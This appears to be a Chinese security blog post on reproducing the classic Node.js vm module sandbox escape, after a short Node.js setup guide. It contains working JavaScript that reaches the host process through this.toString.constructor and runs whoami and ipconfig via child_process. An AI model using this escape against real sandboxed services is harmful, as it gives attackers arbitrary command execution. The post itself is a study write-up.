安全杂记 - 复现nodejs沙箱绕过

目录

一. 配置环境

1.下载nodejs

bash 复制代码
官网:https://nodejs.org/en

2.nodejs配置

安装nodejs的msi文件,默认配置一直下一步即可,以下步骤以默认安装为准,如有安装位置改变,请自行更改环境变量里面的配置。

继续进行环境变量的配置

用户变量如下

系统变量如下

编辑PATH添加如下

在默认安装位置新建如下两个文件

node_cache是放安装过程的缓存文件

node_global是存放安装模块配置位置

测试是否安装成功

继续执行如下命令

bash 复制代码
npm config set prefix "C:\Program Files\nodejs\node_global"
npm config set cache "C:\Program Files\nodejs\node_cache"

安装cluster进行测试

bash 复制代码
npm install cluster -g

3.报错解决方法

如有报错请尝试给nodejs默认安装目录提升用户权限来解决。

二. nodej沙箱绕过

1. vm模块

javascript 复制代码
const vm = require('vm');
const script = `m + n`;
const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)

运行结果

2.使用this或引用类型来进行沙箱绕过

this指向的是sandbox,我们可以获得一个tosString方法,通过toString方法来获得一个构造函数。

所有函数都是由Fuction创造出来的,我们的目的是拿到process模块

因为constructor本身指向它的构造函数,所以我们可以利用constructor函数,来拿到Function函数

沙盒逃逸就是要把外面的元素或者对象引入进来。

如下,此时是利用this

javascript 复制代码
const vm = require('vm');
const script = `
const process = x.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('whoami').toString()
`;

const sandbox = { m: [], n: {}, x:/regexp/};
const context = new vm.createContext(sandbox);
//const res = vm.runInContext(script, context);
const res = vm.runInContext(script,context)
console.log(res)

我们把"x"替换为this也是可以成功执行的,此时m和n可以是任意.,这个是利用了引用类型比如{}。

javascript 复制代码
const vm = require('vm');
const script = `
const process = this.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('ipconfig').toString()
`;

const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
//const res = vm.runInContext(script, context);
const res = vm.runInContext(script,context)
console.log(res)

whoami成功执行,代表着此时已经可以任意命令执行

用户learnpc是我的管理员用户

比如我们这里在执行以下ipconfig来进行验证

以上便是经典的沙箱逃逸来执行命令,当我们可以执行命令的时候,便说明我们其实已经成功拿下。此时也可执行其他不好的命令。

相关推荐
m0_738120721 小时前
PHP代码审计基础——超全局变量(三)
开发语言·安全·网络安全·php
m0_738120723 小时前
PHP代码审计基础——面向对象(四)
android·开发语言·网络·安全·github·php
带娃的IT创业者4 小时前
监控并非安全:当隐私成为技术的祭品
java·开发语言·安全·数据安全·监控·隐私保护·加密技术
MartinYeung55 小时前
[论文学习]LLM-based AI Agent 安全威胁与防御系统性综述
人工智能·学习·安全
不会C语言的男孩6 小时前
TCP通信可视化工具,含下载地址
服务器·网络·安全
遇码8 小时前
开源 Data Agent 实战:用 Lakemind + DuckDB 让 LLM 安全分析本地数据
安全·开源
Chengbei118 小时前
VMware Workstation Pro 26H1免费虚拟化利器
运维·安全·web安全·自动化·系统安全·apache·安全架构
AI创界者8 小时前
打造内网安全防线:使用 Kali Linux 进行企业级漏洞风险自查与防御指南
linux·运维·安全
YOLO数据集集合17 小时前
吊装作业的“电子围栏”:YOLOV13如何用AI框住塔吊下的致命风险
人工智能·安全·yolo·目标检测
@insist12318 小时前
系统规划与管理师-信息安全规划核心考点解析:概述与安全架构
安全·软考·安全架构·系统规划与管理师·软件水平考试·系统规划与管理工程师